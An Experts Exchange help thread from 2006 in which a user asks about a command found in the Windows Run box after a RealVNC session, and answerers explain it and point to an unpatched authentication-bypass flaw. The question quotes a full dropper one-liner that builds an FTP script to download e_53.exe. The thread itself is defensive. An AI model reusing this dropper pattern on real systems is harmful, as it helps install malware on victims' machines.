Solved

Have I been hacked ?

Posted on 2006-11-02
6
1,351 Views
Last Modified: 2013-12-04
When I returned to my Windows XP PC after leaving the (password protected) RealVNC server running, I saw the Run... window had been opened and it contained the following string:
cmd.exe /c del i&echo open 127.0.0.1 31006 > i&echo user 1 1 >> i &echo get e_53.exe >> i &echo quit >> i &ftp -n -s:i &e

What does the above mean please ?
0
Comment
Question by:EugeneGardner
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 3
  • 2
6 Comments
 
LVL 9

Accepted Solution

by:
FixingStuff earned 40 total points
ID: 17863044
Looks like there was a hack attempt. the command does the following:
Creates a file called i with the following contents:
open 127.0.0.1 31006
user 1 1
get e_53.exe
quit

Then it trys to run FTP using the above file as a script.

You are either wide open on the internet.... no firewall, or have port forwarding to VNC, which will get port scanned constantly.
Recommendation LOCK DOWN YOUR MACHINE ASAP.  At least change the default port on VNC.

Go here and run SheildsUP to check your open ports to the world.
www.grc.com

FS-
0
 
LVL 1

Author Comment

by:EugeneGardner
ID: 17865217
Thanks.  GRC thinks I am secure (as I am behind a firewall).  My port 31006 is in 'stealth' mode.
I'm not sure how the Run... command was caused to be issued as my Real VNS connection is password protected.  And where would the e_53.exe file be dropped ?  I can't find it anywhere.  Another thing I don't understand is what would the point of running a script like that be ?  There is no execute command !
0
 
LVL 9

Expert Comment

by:FixingStuff
ID: 17868447
Good that you are secure!
You probably should go back to GRC sheildsup and check port 5900.  Select the "lookup specific port information" button, enter 5900, then click the "Probe This Port" button. That is the default RealVNC port. I also suggest that you change the default to some other unique, unknown port. I don't know how they got past your password, but looks like they did somehow. Again, change the default port and you should probably change the password as well.
As far as what would be accomplished by the FTP script, I agree... it does not look like it would really do anything, especially if the e_53.exe does not exist on your system. It was probably just an attempt to prepare your machine to be a bot of some kind or allow it to be remotely controlled by a hacker.
FS-
0
Put Machine Learning to Work--Protect Your Clients

Machine learning means Smarter Cybersecurity™ Solutions.
As technology continues to advance, managing and analyzing massive data sets just can’t be accomplished by humans alone. It requires huge amounts of memory and storage, as well as the high-speed power of the cloud.

 
LVL 21

Assisted Solution

by:briancassin
briancassin earned 20 total points
ID: 17871591
this issue seems to be directly related to Real VNC

 how old is it ?

because their was a serious security flaw found back around May of this year if you have not updated it, it may be that attackers are getting into your system because you are running an unpatched version of VNC.

Source: eWeek

A "highly critical" flaw in RealVNC's virtual network computing software could allow malicious hackers to access a remote system without a password, according to a published advisory. RealVNC, the Cambridge, U.K.-based company that invented the open-source software, has acknowledged the flaw and posted patches for all affected versions. The RealVNC software, which competes with Symantec's pcAnywhere, allows users access a remote computer from a local PC. The company distributes the software in three versions—free, personal and enterprise edition. The vulnerability is caused due to an error within the handling of VNC password authentication requests. It can be exploited to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password.
0
 
LVL 1

Author Comment

by:EugeneGardner
ID: 17872691
Ahh - good point.  I'm running version 4.1.1   I have just downloaded version 4.1.2
Thanks.
0
 
LVL 9

Expert Comment

by:FixingStuff
ID: 17874034
Good find! I'm on 4.1.1 also. Guess it's time for an update, however, I only use VNC via VPN... very secure that way.
FS-
0

Featured Post

Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Many people tend to confuse the function of a virus with the one of adware, this misunderstanding of the basic of what each software is and how it operates causes users and organizations to take the wrong security measures that would protect them ag…
In a recent article here at Experts Exchange (http://www.experts-exchange.com/articles/18880/PaperPort-14-in-Windows-10-A-First-Look.html), I discussed my nine-month sandbox testing of the Windows 10 Technical Preview, specifically with respect to r…
Michael from AdRem Software explains how to view the most utilized and worst performing nodes in your network, by accessing the Top Charts view in NetCrunch network monitor (https://www.adremsoft.com/). Top Charts is a view in which you can set seve…
Do you want to know how to make a graph with Microsoft Access? First, create a query with the data for the chart. Then make a blank form and add a chart control. This video also shows how to change what data is displayed on the graph as well as form…

724 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question